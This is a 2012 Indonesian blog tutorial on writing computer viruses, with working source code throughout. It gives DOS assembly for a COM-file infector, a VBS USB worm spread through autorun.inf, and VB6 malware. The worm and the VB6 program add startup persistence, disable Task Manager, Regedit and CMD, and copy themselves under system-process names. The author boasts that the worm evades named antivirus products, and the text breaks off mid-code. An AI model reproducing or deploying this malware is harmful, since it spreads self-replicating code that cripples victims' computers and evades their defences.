Sabtu, 31 Maret 2012

Pemrograman Virus Komputer

Cara Kerja Virus Komputer
Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :


Gambar 4.1. Mekanisme Penularan
Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.
Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :
  1. Kemampuan mendapatkan informasi
  2. Kemampuan memeriksa program
  3. Kemampuan menggandakan diri / menularkan
  4. Kemampuan mengadakan manipulasi
  5. Kemampuan menyembunyikan diri sendiri
Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

4. 1.1. Kemampuan mendapatkan Informasi
Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :
1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi
Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size
Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File    ; cari host file

———
int 21h     ; Dos Intrupt
cmp ax,12h  ; Ada file lagi
je exit     ; kalau tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start                ; akhir kode Virus


Listing 4.1. Search First File
Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

4. 1. 2. Kemampuan Untuk Memeriksa Program
Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :

Gambar 4.2. Memeriksa Program
Berikut ini contoh listing dari kemampuan untuk memeriksa file

Mov ah, 3fh       ; Baca file
Mov cx, 3         ; baca 3 byte
Mov dx,3_byte     ; simpan pada buffer
Add dx,si         ; Nama file
Int 21h           ; Dos intrupt
Cmp a,3           ; Cek 3 byte tadi
Jnz cari_lagi     ; Jika sudah tertular exit
Jmp Infect        ; kalau belum , infect_file
3_byte equ $      ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file :     ; bagian penginfeksian

———— ; rutin infeksi

int 20h ; Dos Exit function
nop ; No Operation

Listing 4.2 . Periksa File
Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows
Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.
4. 1. 3. Kemampuan untuk menggandakan diri / Replicating
kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.
File bersih                                 program Virus
Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.
Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :
Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
Berikut ini listing dari 44-Virus.Asm :

virus segment
org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh      ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len     ; cx diisi panjang badan virus
lea dx,start            ; Masukan header Virus “V1″ pada DX
Mov ah,40h              ; Tulis badan virus dalam file korban
Int 21h                 ; Dos Intrupt
Next : mov ah,3eh       ; Tutup file korban
int 21h
mov ah,4fh    ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h         ; Akhir badan virus “V2″
virus ends
end start

Listing 4.3. Replicating / Penggandaan

4. 1. 4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
  1. Menampilkan tulisan / kata-kata / gambar
  2. Membunyikan port speaker
  3. Time bomb / logic Bomb

4.1.4.1. Menampilkan Tulisan / gambar
Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.



virus segment
org 100h
assume cs:virus
len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov ah,09        ; Dos service 09h = Cetak String
lea dx,msg               ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh         ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start           ; Masukan header Virus “V1″ pada DX
mov ah,40h             ; Tulis badan virus dalam file korban
Int 21h                ; Dos Intrupt
Next : mov ah,3eh      ; Tutup file korban
int 21h
mov ah,4fh             ; Cari file korban lagi
int 21h
jnb open_file          ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h         ; Akhir badan virus “V2″
virus ends
end start

Listing. 4.4. Rutin Cetak String
Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –
setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu

mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt

Membuat Virus Sederhana – Notepad

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

1
2
//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
1
2
//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
1
2
3
4
5
6
7
8
9
10
11
12
13
//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = [autorun] & vbcrlf & shellexecute=wscript.exe k4l0n6.dll.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
1
2
3
4
5
6
7
8
9
10
11
//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- k4l0n6.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs )
tf.attributes = 39
//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
1
2
3
for each flashdrive in fs.drives
//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then
1
2
3
4
5
6
7
8
//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs )
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\k4l0n6.dll.vbs ,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs )
tf.attributes = 39
1
2
3
4
5
6
7
8
9
10
//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next
1
//–Manipulasi Registry–//
1
set kalong = createobject(WScript.Shell)
1
2
//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY
1
2
//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 0, REG_DWORD
1
2
3
4
5
6
//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1, REG_DWORD
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1, REG_DWORD
1
2
//–Manip – Disable klik kanan–//
kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu, 1, REG_DWORD
1
2
//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Worm Kalong. Variant from Rangga-Zay, dont panic all data are safe.
1
2
//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs
1
2
3
//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix
kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Kalong
1
2
3
4
5
6
7
8
//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Virus For MsWord Etc

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.

Masukan semua code di bawah ini pada form

==========================================
Private Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib “user32″ Alias “SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ‘sendmessage
Private Declare Function GetDriveType& Lib “Kernel32″ Alias “GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8
Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk
Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ‘silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub
Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(“word.application”)
Set doc = CreateObject(“word.application”)
Set doc = obj.Documents.Add
doc.Content = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub
Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(“excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = “VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub
Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, “Explorer.exe” & ” “”" & FolderMyDocuments & “\services.exe”"” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & “\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, “REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, “REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & “\smss.exe” ‘smss.exe berjalan pada saat startup
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & “\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘search pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, “REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, “REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, “REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite “HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, “255 0 0″, “REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite “HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & “\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, “REG_DWORD” ‘Drive C hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, “REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, “REG_DWORD” ‘Autorun pada CD atau USB
End Sub
Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & “\Winlogon.exe”) <> “Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & “\Winlogon.exe”, FlashDisk & “\Winlogon.exe”
SetAttr FlashDisk & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub
Sub BuatFileAutorunInf()
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & “\Autorun.Inf” For Output As 1
Print #1, “[AutoRun]”
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, “Open=Winlogon.exe”
Print #1, “ShellExecute=Winlogon.exe”
Print #1, “Shell\Open\Command=Winlogon.exe”
Print #1, “Shell=Open”
Close #1
SetAttr FlashDisk & “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub
Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(“WScript.Shell”)
FolderStartUp = RegRun.specialfolders(“StartUp”)
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)
FolderTemplates = RegRun.specialfolders(“Templates”)
FolderNetHood = RegRun.specialfolders(“NetHood”)
FolderPrintHood = RegRun.specialfolders(“PrintHood”)
FolderFavorites = RegRun.specialfolders(“Favorites”)
FolderSendTo = RegRun.specialfolders(“SendTo”)
FolderPrograms = RegRun.specialfolders(“Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderStartUp & “\WinLogon.Exe”
SetAttr FolderStartUp & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderMyDocuments & “\services.Exe”
SetAttr FolderMyDocuments & “\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderTemplates & “\smss.Exe”
SetAttr FolderTemplates & “\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrintHood & “\csrss.Exe”
SetAttr FolderPrintHood & “\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderNetHood & “\Isass.Exe”
SetAttr FolderNetHood & “\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderFavorites & “\SalamKenal.Exe”
SetAttr FolderFavorites & “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderSendTo & “\System.Exe”
SetAttr FolderSendTo & “\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrograms & “\ctfmon.Exe”
SetAttr FolderPrograms & “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub
Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
